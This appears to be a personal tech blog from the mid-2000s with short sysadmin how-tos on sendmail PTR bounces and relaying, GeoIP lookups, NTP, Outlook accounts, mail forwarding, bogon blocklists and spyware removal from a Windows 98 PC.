If you receive bounced messages with "cannot resolve PTR record" or "(reason: 554 5.7.1 The server sending your mail [xxx.xxx.xxx.xxx] does not have a reverse DNS entry. Connection Rejected" as the reason listed for the message bouncing, with "xxx.xxx.xxx.xxx" representing the IP address for your SMTP server, or see messages, such as "Relaying temporarily denied. Cannot resolve PTR record for" followed by your mail server's IP address in your /var/log/maillog file, then the email server that received the message checked the Internet Protocol (IP) address for the sending server. It then tried to do a "reverse lookup" on the IP address to obtain the name of the server. If it couldn't perform the reverse lookup, then it would bounce the message with a statement that it couln't resolve the PTR record. A PTR record is an entry in a Domain Name System (DNS) server that maps IP addresses back to names.

If you see references to http://postmaster.info.aol.com/errors/421dnsnr.html for messages destined for aol.com or netscape.net users, it is due to the same issue. Netscape.net is owned by AOL

An email server adminsitrator may configure an email server to perform such a check to block spammers. I suppose the thinking is that systems used by spammers are more likely not to have PTR records in a DNS server. But, since many email servers not used by spammers will also not have PTR records, I believe such a check is likely to block as much, if not more, legitimate email than spam. And it is hardly an effective means of eliminating spam, since many systems transmitting spam will have PTR records.

A small business may have its own email server with a domain name that maps to an IP address, but the company's ISP may not have an entry in a DNS server that maps that IP address to a name. In such a case, the business may find that email to some domains bounces with the error message about the missing PTR record.

If you are a system administrator with users reporting that they are receiving bounced messages with the "cannot resolve PTR record" for messages addressed to certain domains, then you can configure your email server to send email to just those domains through another email server instead. For instance, your ISP may have restrictions that prevent you from sending email to more than a limited number of recipients at one time. You may have a mailing list that has more email addresses than the ISP allows to be reachable with one message. So you need to use your own email server to reach all of the members of the mailing list. But some of the mailing list members may be using email servers that attempt to look up a name from the IP address of the sending server contacting them.

If you are running sendmail to transmit email, you can edit mailertable, which will be in /etc/mail on a RedHat Linux system. The mailertable file contains special treatment information for a specific domain or family of domains.

As an example, suppose email to bob.bobaroo@us.danzas.com is bouncing with the message about "cannot resolve PTR record". You can add the following line to /etc/mail/mailertable:

us.danzas.com                   smtp:[smtp.centrivity.net]

Once you've added the line, you need to run makemap, to produce the mailertable database sendmail uses. You then need to restart sendmail.

makemap hash /etc/mail/mailertable </etc/mail/mailertable /etc/init.d/sendmail restart

The first command above will produce or update the file /etc/mail/mailertable.db. I am presuming that you already have mailertable support within sendmail. You can check if that is the case by looking for mailertable within your sendmail.mc file as below:

grep mailertable /etc/mail/sendmail.mc

You should see something like the following, if sendmail is already configured for mailertable support.

FEATURE(`mailertable',`hash -o /etc/mail/mailertable.db')dnl

The above example presumes that the ISP server, smtp.centrivity.net, does not require authentication. If the server requires authentication, then you will need to modify the access file, which you may find in /etc/mail. Let's say that the smtp.centrivity server accepts plaintext authentication with a userid of jsmith and a password of GrassHopper. You could enter the following line in /etc/mail/access to have sendmail on your system send the necessary authentication information to the smtp.centrivity.net server.

AuthInfo:smtp.centrivity.net "U:jsmith" "P:GrassHopper" "M:PLAIN"

You would then also need to produce or update /etc/mail/access.db using the makemap command.

makemap hash /etc/mail/access </etc/mail/access

In the case of the ISP's server requiring authentication in order to send email through it to a destination address that is not an email addres on the ISP's servers, you would edit the mailertable and access files before restarting sendmail with /etc/init.d sendmail restart.

References

[/network/email/sendmail] permanent link

Determining the Country Associated with an IP Address

You can use GeoIP to look up the country associated with a given IP address (you can also give it a hostname to determine the country). To create the GeoIP program geoiplookup, you can download the C source code from http://www.maxmind.com/app/c. You will need a C compiler to compile the code. If you intend to use it on a Linux or Unix system, you will have a C compiler on the system, so just follow the instructions below to create the geoiplookup program or read the INSTALL file that comes with the file you download from the MaxMind website. If you intend to install it on a Windows system, read the READMEwin32.txt file that is in the .gz file you download.

Unzip the downloaded file, extract the contents of the resultant tar file and then change the working directory to the GeoIP directory created from the contents of the tar file.

gunzip GeoIP-1.3.6.tar.gz tar -xvf GeoIP-1.3.6.tar cd GeoIP-1.3.6

Then run the configure and make commands (installation instructions are in the INSTALL file created in the GeoIP directory, but are also summarized here).

./configure make

You can then issue the command make check to run self-tests of the package, but this step isn't required. You should then type make install to install the software.

make test make install

At this point you won't need the program binaries and other files in the source code directory and they can be removed with make clean. You can also remove the files created by configure by issuing the command make distclean. You can also remove the GeoIP directory and its contents, if you wish, since make install installs the package's files in /usr/local/bin, /usr/local/man, etc.

make clean make disclean cd .. rm -fr GeoIP-1.3.6

When the program is installed, you will have a geoiplookup program in /usr/local/bin. You can use that program to lookup the country associated with an IP address or hostname. The country is based on the registration for the IP address, i.e. particular blocks of IP addresses will be associated with particular countries or at least areas of the world. The company using the IP address may be based in some other country, however. For example:

geoiplookup eapplique.com GeoIP Country Edition: US, United States

The company has their website, eapplique.com, hosted on a server with a US IP address. But if you issue the command whois eapplique.com, you will see the domain name is registered to a company in India (the company provides website design services). So geoiplookup gives you an indication of where a server is likely to be located, but not necessarily the location of a particular company using that server. Companies and individuals may use servers located in other countries.

Registrant:
THE SCS GROUP (EAPPLIQUE-DOM)
   K 3/17, DLF Phase II
   GURGAON, HARYANA 122002
   IN

   Domain Name: EAPPLIQUE.COM

For an example of a lookup for an IP address, here is another example:

geoiplookup 202.64.156.35 GeoIP Country Edition: HK, Hong Kong

[/network/Internet/IP] permanent link

Changing the "From" Address in Outlook 2000

To change the "From" address of a message in Outlook, create a new account using the address you wish to use as an alternative "From" address. You can create a new account by the following steps:

Click on Tools.
Click on Accounts.
Click on the Mail tab at the top of the window.
Click on the Add button then select Mail
Put in the display name you wish to appear in the message. This is just whatever you wish to be the name recipients will see with the email address, e.g. "John Smith".
Click on the Next button.
Type in the alternative e-mail address you wish to use.
Click on the Next button.
Select whether the server you wish to use is a POP3 or IMAP server and specify the server names for incoming and outgoing email.
Click on the Next button.
Put in the password if you want the system to remember it rather than prompting you each time, otherwise leave it blank and uncheck "Remember password".
Click on the Next button.
Select your connection method and click on Next.
Click on the Finish button.

If this isn't an email account you will be checking regularly, but just an alias, i.e. an alternative address that points to the same account as one you are already checking, select the account by clicking on it and then click on Properties. Then uncheck "Include this account when receiving mail or synchronizing". Then click on Ok. Then click on Close to close the Internet Accounts window. You might want to send a message with information@somewhere.com as the "From" address, rather than jsmith@somewhere.com, so in the case that information@somewhere.com is just an alias pointing to the jsmith@somewhere.com mailbox, you would uncheck the "Include this account when receiving mail or synchronizing", since it isn't a separate account.

Once you've gone through the above procedure, you won't need to repeat it again and can use the alternate address you specified as the "From" address in messages by the following procedure:

Compose a message in Outlook the way you normally would.
You may see "To", "Cc", and "Subject" fields, but no "From" field. Click on the Options button.
Click on the downward pointing triangle to the right of the Send message using field to see the list of email addresses you can use in the "From" field. Pick the one you wish to use and then click on the Close button.
Fill in the "To" and "Subject" fields as usual, edit the message and then click on the Send button. The message will now go out with the address you picked for the "From" field.

[/os/windows/office/outlook] permanent link

Keeping a Linux System's Time Accurate

PC and workstation clocks are not highly accurate and will tend to drift from the correct time over time. To keep the system's clock accurate, one can use the Network Time Protocol (NTP). The fact that a system's clock is off by a few minutes may not seem important at first, but if you have to troubleshoot problems involving multiple systems, you will realize that it can take much longer to troubleshoot if the clocks on the systems vary and you must mentally adjust the times to determine the order of events.

NTP software will provide the capability for a system to contact a time server, which provides an accurate time source. In the United States time servers may be tied back to the time source provided by the National Institutes of Standards and Technololgy (NIST).

On RedHat Linux systems, you can use the ntp package to set up your system to obtain time from a time server using NTP.

Installing and configuring the ntp package on RedHat Linux is detailed below. The example below uses ntp-4.0.99k-15.i386.rpm, which is version 4.0.99k release 15 of the ntp client. If you are using a later version of RedHat Linux, a newer version of ntp may be available for your version of Linux. Except for the RPM file name, the installation and configuration process should be similar.

Install the package, e.g. rpm --install ntp-4.0.99k-15.i386.rpm.
Edit /etc/ntp.conf file. Add a server line to point to a publicly accessible time server, e.g. server 198.82.162.213 to use the time server lennier.cc.vt.edu. You then should have lines similar to the following in the ntp.conf file:

server 198.82.162.213 server 127.127.1.0 # local clock fudge 127.127.1.0 stratum 10
Use chkconfig to configure the service to start when the sysem boots

chkconfig ntpd on
Start the service.

/etc/init.d/ntpd start
If you wish to immediately update the time to match that on the time server, you can use the ntpdate command, e.g. ntpdate -b lennier.cc.vt.edu.

You can check that the service is functioning with the ntpq command.

ntpq -p
     remote           refid      st t when poll reach   delay   offset  jitter
==============================================================================
 lennier.cc.vt.e Tick.UH.EDU      2 u   34   64    1   28.516    0.340   0.000
 LOCAL(0)        LOCAL(0)        10 l    9   64    1    0.000    0.000   0.000

You can check to see whether your system is functioning as an NTP server, which means it will be listening on NTP UDP port 123 by using the netstat command.

netstat -a | grep "ntp"
udp        0      0 gna.somewhere.com:ntp    *:*
udp        0      0 localhost.localdoma:ntp *:*
udp        0      0 *:ntp                   *:*

You should see the system name followed by ":ntp", which indicates it is listening for connections on the NTP port, UDP port 123.

If you are blocking access to the system with a firewall, you will need to provide a rule for UDP connections to port 123, if you want to allow other systems the capability of obtaining the time from your NTP server.

If you wish to trace the path back through a sequence of time servers to find the master time source, you can use the ntptrace command.

ntptrace
localhost.localdomain: stratum 3, offset 0.000100, synch distance 0.22896
lennier.cc.vt.edu: stratum 2, offset -0.016537, synch distance 0.04396
time-b.nist.gov: stratum 1, offset -0.012730, synch distance 0.00000, refid 'ACTS'

The example above shows that the system gets its time from lenier.cc.vt.edu, a stratum 2 server, which in turn gets the time from time-b.nist.gov, a stratum 1 server.

References

[/os/unix/linux/network] permanent link

Determining the Version of Irix Running on an SGI System

To determine which version of the Irix operating system i(OS) you are running on a Silicon Graphics, Inc. (SGI) system, use the "uname -R" command.

uname -R 6.5 6.5.19m

The second of the two values, minus the trailing character, is the actual version number, e.g. 6.5.19 above. SGI calls this value the "extended" version number.

The "-R" option to the uname command is unique to Irix systems. See the Irix uname manpage for further information on version numbering and options for the uname command on Irix systems.

[/os/unix/irix] permanent link

CDisplay Comic Reader

A family member with a fairly extensive comic collection recently discovered files with a .cbr extension, which purportedly contained comics in an electronic format. After a little investigation I found that the CBR extension was listed on the File Extension Source as being associated with CDisplay RAR archived comic book files (see http://www.filext.com/detaillist.php?extdetail=CBR).

The CDisplay program, which can be used to read these files, has a webpage at http://www.geocities.com/davidayton/CDisplay. The program reads files that contain collections of comic book pages in JPEG, PNG, and static GIF formats. It can read images stored in zip, rar, ace, or tar archives without needing to extract the image files from the archive file first. You can use the arrow keys on your keyboard or the space bar to view the pages of the comic sequentially.

The software is free and can be downloaded from http://cdisplay.techknight.com/setup.zip via a link from the developer's website. The author provides the following files from the http://cdisplay.techknight.com/ website:

CDisplay Comic Reader
CDisplay Comic Reader with Subtitles
Version which can be used for subtitles with the idea that translations for other languages can be provided. This version is a work in progress, so shouldn't be presumed to be bug free.
Example Comic Pages
CDisplay Debug Kit
Debugging tool that allows the capture of CDisplay diagnostic information which can be sent to the CDisplay author to assist in the resolution of any problems encountered with the software. This tool doesn't work on Windows 95, 98, nor ME, only on later versions of Microsoft Windows operating systems.

[/os/windows/software/comics] permanent link

Norton AntiVirus 2000 Intelligent Updater Fails

I've found that whenever I try to update the virus definitions for Norton Antivirus 2000 using the x86 Intelligent Updater package available from http://securityresponse.symantec.com/avcenter/download/pages/US-N95.html, I receive a message indicating the subscription is expired, though it is not expired. The error message I receive is as follows:

Symantec Security Response Intelligent Updater Your virus protection cannot be updated. Your subscription has expired. You must renew your subscription to continue using Intelligent Updater. Run LiveUpdate from Norton AntiVirus to renew your subscription and then run Intelligent Updater again.

Yet if I select Help, then About Norton Antivirus, and then click on the Norton AntiVirus tab, I see "Your virus definitions subscription started on 2/17/2004, and will expire in 210 days." I've tried this on several different occasions with similar results.

However, if I use the i32 Intelligent Updater package, which is available from the same URL, that package will update Norton AntiVirus 2000.

The i32 Intelligent Updater package, which is a smaller file than the x86 Intelligent Updater package, cannot be used to update Symantec AntiVirus Corporate Edition 8.0 servers or Norton AntiVirus Corporate Edition 7.6 servers, but can be used to update Corporate Edition clients. The x86 Intelligent Updater package can be used to update Corporate Edition clients and servers.

[/security/antivirus/symantec] permanent link

Allowing VPN Access for a User Under Windows Small Business Server 2003

First you must configure Windows Small Business Server 2003 to function as a VPN server, which you can do by running the Routing and Remote Access Server Setup Wizard. Once you have done that, you can modify the properites for a user's account to allow the user to connect using a VPN client on his or her computer. To do so, take the following steps:

Click on Start
Click on Administrative Tools
Click on Server Management
Click on Users
Right-click on a username and select Properties
Click on the Dial-in tab
Click on Allow access
Click on OK
Click on File then Exit to exit Server Management

If the user doesn't have permission for VPN access, the user will see a window appear with the following error message when he or she attempts to establish a VPN connection:

Verifying username and password... Error 649: The account does not have permission to dial in.

[/os/windows/server2003] permanent link

Missing Hibernate Button

I didn't see a Hibernate option on a Gateway model 600YG2 laptop running Windows XP when I clicked on Start and selected Turn Off Computer. But when I looked under Power Options within the Control Panel, the "Enable Hibernation" checkbox under the Hibernation tab was checked.

The three buttons that appear when I select Start then Turn Off Computer are Stand By, Turn Off, and Restart.

It is still possible to place the system in hibernate mode, however, by hitting the shift key when you move the mouse to place the cursor over the Stand By button. The button will change from Stand By to Hibernate and you can click on the button then to put the system in Hibernate mode.

Microsoft covers the issue in Knowledge Base Article 291790

The difference between Hibernate and Standby mode is that in Standby mode the system goes into a low power mode saving information on the current state of the system and open applications in memory. In hibernate mode, the system stores that information on the hard disk in the hibernation file Hiberfil.sys. The system can return to its previous state quickly from standby mode, since accessing information in memory is very quick. It takes more time to restore the system from hibernate mode, since the system must read information from the hard disk for which access is much slower. But hibernate mode has the advantage of storing the information indefinitely even if the system is not connected to a power source. With a laptop in standby mode, if you don't have it plugged into a power source, eventually the battery will be drained and the contents of memory will be lost, since information only stays in memory if it is constantly refreshed. It doesn't take much power to keep the memory refreshed, so you may be able to stay in standby mode for many hours, but eventually the battery will be depleted and the information will be lost.

You can choose to have the system go into hibernate mode when you hit the power button, rather than powering off by the following steps:

Click on Start
Select Control Panel
Click on Performance and Maintenance. If you don't see Performance and Maintenance then you may have set the Control Panel display to "Classic" mode, in which case you can proceed to the next step.
Click on Power Options
Click on the Advanced tab
Change the setting for When I press the power button on my computer to Hibernate
Click on OK

[/os/windows/xp] permanent link

Forwarding Email

If you are using a Unix or Linux system, you can redirect email sent to your account on that system to another account using a .forward file. You will need to create this file in your root directory, i.e. the one you are normally placed in when you log into the system.

You can create this file with any text editor or you can use the echo command to create the file as shown below.

echo 'liz-smith@starwars.com' > .forward

The above command will create a .forward file in the current directory. If you've placed it in your root directory, any email now sent to your account will instead be sent back out of the system to liz-smith@starwars.com.

Suppose you want to get the email in your inbox on the system, but also want it forwarded to another address. Let's assume your userid on the system is liz and you want the email to go to the same address as in the first example as well. You can then create the .forward file with the command below.

echo '\liz, liz-smith@starwars.com' > .forward

You need to put a "\" before the username, so that the system knows that it doesn't have to do any further forwarding for the account name you are placing after the "\". If you want messages to go to additional addresses, just add them onto the line with commas between the addresses.

When you use the ">" you are overwriting any existing .forward file, so, if you already have a .forward file and want to keep a copy of it, use a command such as the one below to copy it before issuing the echo command.

cp .forward .forward-old

If you want to stop forwarding, you need to remove the .forward file. If you want to stop forwarding, but want to keep the file available for future use, you can rename it as shown below.

mv .forward .forward-old

You may need to set appropriate permissions on the .forward file in order for the program processing email to be able to read your email file. Use the command below to make the .forward file "world-readable".

chmod 644 .forward

The six ensures that you can both read and alter the file, while the two fours ensure that the file is both group and world readable, but only you can delete or alter the file. Don't make the file group writeable, i.e. don't use chmod 664. If the file has group write permission set on it, sendmail won't use it and forwarding won't occur.

You can check the permissions on the file using the command ls -al .forward. Files that have a filename beginning with a period are considered hidden, so won't show up with just an ls command, so you need to use the -a option to show all files. You should see something like the following.

-rw-r--r--    1 liz      liz            29 Jul 14 23:06 /home/liz/.forward

If you have root access, you can check how sendmail will handle delivery of email to the liz account now by logging on as root and issuing the sendmail -bv command as below:

sendmail -bv liz \liz... deliverable: mailer local, user \liz liz-smith@starwars.com... deliverable: mailer esmtp, host starwars.com., user liz-smith@starwars.com

When you are forwarding email, you need to be careful to not create an infinite loop, e.g. where email is forwarded to an account that forwards it again to the orginal account.

References:

Mail forwarding using .forward files

[/network/email/sendmail] permanent link

Flash Support Detection

If you need to know whether a web browser supports Macromedia's Flash format, Colin Moock provides a script at http://moock.org/webdesign/flash/detection/moockfpi/, which you can use on your web server to determine whether a visitor to your site has Flash support in his or her browser and whether the version of Flash supported is the currently available version. As he notes on his website, Flash detection methods can't provide 100% certainty. He estimates that you may be able to reach a certainty of 90% to 97%.

I've included his code on a webpage at the link below that you can use to test whether a browser on a particular system has support for Flash.

Flash Support Test

[/network/web/browser] permanent link

PowerPoint Viewer

For those who may need to view or print a PowerPoint presentation, but don't need the capability to create or edit PowerPoint presentations, Microsoft offers a free PowerPoint viewer.

Links to download viewers for other Office applications can be found at Microsoft Office Converters and Viewers.

Viewer: PowerPointViewer 97
Download Size: 2789 KB
Date Published: 2/20/2004
Version: 2000
Requirements:

Windows 2000, Windows 95, Windows 98, or Windows NT
A personal computer with a 486 or higher processor
Microsoft Windows 95, 98, or 2000 operating system, or Microsoft Windows NT Workstation operating system 3.51 (with Service Pack 5.x or later) or 4.0, or Microsoft Windows ME
7 MB of hard disk space (9 MB free for installation only)
VGA or higher-resolution video adapter
Microsoft Mouse or compatible pointing device

Comments: for users who don't have Microsoft PowerPoint®; it allows them to view PowerPoint 95, 97, 2000, and 2002 presentations. This PowerPoint viewer supports all PowerPoint 95 and PowerPoint 97 features, but the following PowerPoint 2000 and 2002 features are not supported:

Picture bullets
Automatic numbering
Animated GIF pictures
Microsoft Visual Basic® for Applications (VBA) controls
ActiveX® controls are not supported by the viewer

Viewer: PowerPoint 2003 Viewer
Download Size: 1911 KB
Date Published: 9/15/2003
Version: 1
Requirements: Windows 2000 Service Pack 3, Windows 98 Second Edition, Windows ME, Windows Server 2003, or Windows XP
Comments: The Microsoft Office PowerPoint 2003 Viewer lets you view full-featured presentations created in PowerPoint 97 and later versions. The PowerPoint 2003 Viewer also supports opening password-protected Microsoft PowerPoint presentations. This viewer doesn't suport the following features:

Information Rights Management (IRM) presentations.
Running macros, programs, or opening linked or embedded objects.

If you don't have Service Pack 3 or later on a Windows 2000 system, you should use the PowerPointViewer 97. You can check which service pack you have installed by clicking on Start, Run, and then typing Winmsd. The system summary will show you the OS Name and the Version. If you don't see Service Pack 3 or later listed next to the version for a Windows 2000 system, then use the earlier PowerPoint viewer.

[/os/windows/office/powerpoint] permanent link

Instructions for Updating Bazooka Adware and Spyware Scanner Database Manually

Bazooka Adware and Spyware Scanner has an update button in the program, but if you need to manually update Bazooka's adware/spyware database the steps are listed below. You may want to use this method to download the database from the author's website, if you have multiple systems you need to update and don't want to download the same file many times or if you have an infected system that you want to keep off-line until you have removed adware/spyware from it.

Shut down Bazooka if it is running.
Download the latest database from http://www.kephyr.com/spywarescanner/bazooka_db.bdb
Save the new database file at the same location using the same name as the old database file. The old database is called "bazooka_db.bdb" and, if the default location was chosen when the program was installed, will be located in "C:\Program Files\Bazooka Adware and Spyware Scanner\system\".
Start Bazooka.

If you cannot find the old database, search for "bazooka_db.bdb" on all your hard drives by clicking on "Start" and then selecting "Search" to have your system locate it.

When you start the program, it tells you how old your current database is at that moment. You will see something like "Your Bazooka database is 31 days old, detecting 335 spywares."

Though the program is freeware, if you haven't made a donation to the author, remember it takes a lot of time and effort to provide such software and it costs the author to maintain a website. And it is truly free, not like some of the programs you may have downloaded that came with adware and/or spyware requiring you to seek software such as this to free you from the misery of poor performance and system instability brought on by the installation of those other programs. Though Bazooka doesn't automatically remove the adware/spyware software like some other programs do, I've found it finds adware/spyware that other programs miss. And, if you run Bazooka after you run some other adware/spyware removal programs, you may find that Bazooka still reports some adware/spyware on the system that you thought you removed. Annother adware/spyware removal tool may have removed most of an adware/spyware program, effectively stopping it from harming your system, but sometimes they leave a few remnants behind, such as registry entries or files. If you peruse Bazooka's manual removal instructions, you can find these remnants and remove them from your system.

References:

Manual database update instructions

[/security/spyware/bazooka] permanent link

How to Determine the Long Distance Carrier on a Line

You can determine the long distance provider for a phone line by calling 1-700-555-4141 from the telephone you wish to check. You will hear an announcement telling you the name of the carrier.

[/phone] permanent link

Sun May Adopt the Open-Source Model for Solaris

Pressure from Linux is apparently continuing to push Sun into moving its proprietary version of Unix, Solaris, to the open-source model for software distribution. A June 2, 2004 article titled " Solaris goes open-source" appearing in Government Computer News quotes company president and chief operating officer Jonathan Schwartz as stating that Sun intends to "create a rich, open environment" around Solaris.

Sun has been talking about such a move for years as shown by an August 28, 2002 article by David Berlind titled " Unplugged: Sun chief engineer Rob Gingell, Part II". On page 2 of the article there is a discussion betweeen the author and Rob Gingell, Sun's chief engineer at the time, about Solaris and the open-source model.

References:

Solaris goes open-source
By Susan M. Menke
Date: June 2, 2004
Unplugged: Sun chief engineer Rob Gingell, Part II
By David Berlind
Date: August 28, 2002

[/os/unix/solaris] permanent link

Bogon Block

I received an email today advertising "FDA approved druugs". This spam message was filled with misspellings, e.g. "Special Offeer for limiteed time only", "Saave upt to 70% now", and "Clickk heree to saave 70%+", a technique spammers use in an effort to bypass spam filters which look for common phrases often found in spam. When I checked the originating IP address in the email headers, I saw an IP address of 77.119.208.80. I checked that address in a number of block lists without finding it listed. However, when I tried dr. Jorgen Mash's DNS database list checker, I found the address listed as a "bogon".

A bogon is an IP address that should not normally be routed on the Internet. Some address blocks, e.g. the private address block 192.168.xxx.xxx, are not normally routed on the Internet, because they are reserved for special uses. The Bogon IPs webpage provides a means to check on whether a particular address is a bogon. The List of all Bogon IPs in Netrange format shows that the range 71.0.0.0 - 79.255.255.255 contains unallocated or reserved address space. And the Internet Assigned Numbers Authority, which is the organization that allocates IP address space, lists addresses beginning with 77 as reserved addresses. So I should not be seeing this address as a source IP address for an email address. The fact that it is listed as the origination point for the message indicates it is likely from a system being used for dubious purposes, such as the transmission of spam.

The Completewhois Project provides a DNS block list bogons.dnsiplists.completewhois.com that can be used with sendmail to automatically block email from bogons. They also provide other subsets of the complete block list, which are listed on their Using IP Lists page.

I added their block list to those I have sendmail check each incoming message against by taking the following steps:

I added the following line beneath the FEATURE(`blacklist_recipients')dnl line in /etc/mail/sendmail.mc:

FEATURE(`dnsbl', `bogons.dnsiplists.completewhois.com', `"550 Mail from " $`'&{client_addr} " refused see http://www.completewhois.com/bogons/"')dnl
I then issued the command below

m4 /etc/mail/sendmail.mc > /etc/mail/sendmail.cf
I then stopped and restarted sendmail with the command below

/etc/init.d/sendmail restart

References:

[/network/email/spam] permanent link

Sharing Folders with Net Folders

Microsoft Outlook 98 and 2000 provide the capability for you to share your calendar, contact lists, and other folders with others using Outlook. This can be very helpful for small offices that don't want to purchase Exchange Server or Micorosoft's Small Business Server 2003 software. I've provided some basic instructions for how to use Microsoft Outlook's Net Folders feature to do so.

[/os/windows/office/outlook] permanent link

Determining Your IP Address

If you need to determine the IP address systems on the Internet will see as your address, you can go to any of the following sites:

WhatIsMyIP.com
WhatIsMyIP.org
Canadian Web Solutions
internet-help.net (click on the Quick-Find link)

Keep in mind that address is not necessarily the IP address assigned to your computer if you are on a Local Area Network (LAN). If you are behind a firewall or a router performing Network Address Translation (NAT), your locally assigned address may differ from the address websites and other servers on the Internet see as your originating address. If your router is performing NAT, there may be multiple computers behind the router with unique IP addresses, but the router may have ony one outside IP address. The router keeps track of which connections are associated with which inside IP addresses.

You can determine your system's actual address by going to What is my IP Address?. Or if you are using a PC running Windows by getting a command prompt by clicking on Start, Run, and then typing command and hitting enter. Then type ipconfig, which will show you your IP address, your subnet mask, and the default gateway address, which is the address of the system, e.g. a router, that your system would use to gain access to the Internet. On a Linux system, if you are logged on as root, you can type ifconfig -a, then look for the "inet addr" value, which will usually be associated with the eth0 interface. The l0 interface is a "loopback" address of 127.0.0.1, which is just an address that allows a system to communicate with itself.

[/network/Internet/IP] permanent link

Mailq Out of Memory Errors

If you run the mailq command and see an "Out of memory" error as in the following example, then the recipient's email server is experiencing a memory problem.

----Q-ID---- --Size-- -----Q-Time----- ------------Sender/Recipient------------
i3DILcw21033     3415 Tue Apr 13 14:21 <eliza@ninsol.com>
                 (Deferred: 452 4.3.1 Out of memory)
                                       <MWalsh@cmflines.com>

You will likely see corresponding sendmail entries in your mail log file, e.g. /var/log/maillog.

Apr 13 17:49:06 gna sendmail[21965]: i3DILcw21033: to=<MWalsh@cmflines.com>, ctladdr=<eliza@ninsol.com> (106/100), delay=03:27:27, xdelay=00:00:00, mailer=esmtp, pri=393958, relay=mail2.cmflines.com. [63.208.156.193], dsn=4.0.0, stat=Deferred: 452 4.3.1 Out of memory

[/network/email/sendmail] permanent link

Procedure for Generating Norton Ghost Bootable CD

I've found Norton Ghost to be very useful for backing up systems. The program will allow you to back up an exact image of a drive or partition. It will work with FAT, FAT32, NTFS, ext2, and some versions will even allow you to backup ext3 partitions.

A problem I've encountered is that the program only allows you to generate bootable diskettes. Some newer sysems don't have a floppy drive. A boot CD is needed for those systems. For those systems, generate a bootable floppy diskette of the type you want, e.g. with USB and Firewire support or for a network backup. Then use a CD writing program to generate a bootable CD. Many newer CD burning programs allow you to generate bootable CDs from a bootable floppy.

The procedure I've listed below is for Roxio's Easy CD and DVD Creator 6, but you should be able to use a similar procedure with another program, e.g. Nero.

Start Creator Classic
Click on File
Click on New Project
Select Bootable Disc
Make sure Bootable Disc Type is set to Floppy Disk Emulation (1.44 MB) and Emulation Option is set to Generate Image from Floppy. You can uncheck Retain Boot Image File unless you want to generate more bootable discs in the future without reinserting the floppy (see Figure 1). You can leave the Advanced options set to the default of 0x7c0 for Load Segment and 1 for Sector Count
Click on OK
Click on the orange "burn" button at the lower right-hand side of the Creator Classic window
A Record Setup window then appears. Unless you need to change any settings, just click on OK
You will see a Burn Disc Progress window appear. When the process reaches 100%, you will see a message that "You new disc is complete." Unless you want to use Creator Classic to create a label, click on Close then OK.
When the message appears asking whether you want to save project changes, you can click on No unless you want to generate more CDs exactly like the one you just generated.
You can now close Creator Classic and use the boot CD you just created to boot a system into Norton Ghost.

If the system isn't configured to try booting from a bootable CD before attempting to boot from the hard disk, you will need to enter the BIOS setup routine, which you can do after you power the system on, by hitting the appropriate key, e.g. Del (Dell) or F1 (Gateway). Or many newer systems will allow you to hit a key at startup time to specify what device you want to boot from, e.g. F12 (Dell) or F10 (Gateway).

[/os/windows/utilities/backup/ghost] permanent link

Solaris Version Numbering

Sun's operating system versioning scheme has seemed confusing to me, since the same operating system version may be referred to with different version numbers. An explanation of Sun's numbering scheme for Solaris can be found at Sun Versus Linux: The x86 Smack-down where the following explanation can be found:

After Solaris 2.6, Sun decided to change how it named each Solaris version. The next version was Solaris 2.7, but Sun called it simply “Solaris 7”. Solaris 8 is actually 2.8, and Solaris 9 is 2.9. They are sometimes still referred to by the old nomenclature (i.e. 2.7), especially when dealing with porting and software versioning.

A bit confused? I've still got more! Solaris versions are also sometimes referred to as SunOS, and different numbering schemes apply there as well.. SunOS was the original operating system released by Sun in 1981 and is based on BSD, where Solaris is based on SVR4 Unix (System V). The last version of SunOS was 4.1.4, which would make Solaris 2.0 (Solaris started at 2.0) SunOS 5.0. So Solaris 9 is also known as Solaris 2.9 and also known as SunOS 5.9.

The article by Tony Bourke also offers a comparison of Linux and Solaris.

Another good source of information on the naming of Solaris version naming is the Wikipedia SunOS article.

[/os/unix/solaris] permanent link

Windows 98 System Hanging After Login

My mother-in-law told me her Windows 98 PC hangs after she enters her name and password to log into it. She said that even if she waits a long time, she can't get any further. Rebooting the system puts it back in the same state.

When I tested the system, I found I could bring up the Windows Explorer with Ctrl-Alt-Del, which showed the following tasks.

Explorer
Starter
Systray
Scanregw

I ended the Scanregw task, but that didn't help and then I couldn't even bring up the task list again. I rebooted and logged in with my wife's userid and password. When I brought up the task list, again I saw the same tasks, but this time I saw "Not responding" listed after Explorer. I ended the Windows Explorer task and then the system appeared to perform normally. However, when I opened Windows Explorer, I saw "Finalizing installation" continually scrolling across Windows Explorer directly beneath the address bar.

The antivirus program wasn't shown in the system tray. When I went looking for the program with the Windows Explorer, I saw a Hotbar folder under the Program Files folder. I've encountered problems with this adware/spyware program on other systems and would not leave it on any PC I support.

The company that produces this adware/spyware claims "Hotbar enhances and personalizes your Internet & email applications" and can "make your emails unique with hundreds of animations, backgrounds and more" and allows you to "design & send FREE eCards from your existing email". They also state that Hotbar will "brighten your browser with colorful images & enhance your surfing experience with Smart Buttons!" But their "free" software comes with an unseen price tag. This software is likely to significantly impair the performance and stability of your system.

If you click on the Terms of Use and License link you will find the following:

HOTBAR COLLECTS AND STORES INFORMATION ABOUT THE WEB PAGES YOU VIEW AND THE DATA YOU ENTER IN SEARCH ENGINE SEARCH FIELDS WHILE USING THE SOFTWARE. HOTBAR USES THIS INFORMATION TO DETERMINE WHICH ADS AND BUTTONS TO DISPLAY ON YOUR HOTBAR TOOLBARS AND WHICH ADS TO SHOW YOUR BROWSER.

So you are subjecting yourself to "targeted" popup ads, if you install the software.

Hotbar.com states that you can use Windows control panel Add/Remove Programs option to rid yourself of this software by opting to remove Outlook Tools by Hotbar, Web Browser Tools by Hotbar, and Shopper Reports Adapter. Or you can download an uninstaller from the company's website at http://hotbar.com/downloads/HbUninst.exe. Instructions on how to manually remove the software can be found at http://www.kephyr.com/spywarescanner/library/hotbar/index.phtml. I usually rely on Spybot Search & Destroy to rid systems of adware and spyware. Spybot is a free adware/spyware detection and removal program, though you should make a donation to the developer to ensure he can continue to maintain and developer such a worthwhile program.

I also use Bazooka Adware and Spyware Scanner from Kephyr to locate adware/spyware on systems. It is also free, but you really should consider making a donation to help the developer continue his work. Bazooka Adware and Spyware Scanner does an excellent job detecting such software, but can't automatically remove such software. However, the developer does provide instructions on manually removing such software. I've found that Spybot and other adware/spyware removal tools, though they disable and remove most of the bits and pieces of adware/spyware they detect, sometimes will still leave a few files, registry entries, etc. that Bazooka will detect. I can then use the manual removal instructions on the Kephyr website to remove the last remnants of the programs.

I started a Spybot Search & Destroy scan of the system. Spybot found the following adware/spyware.

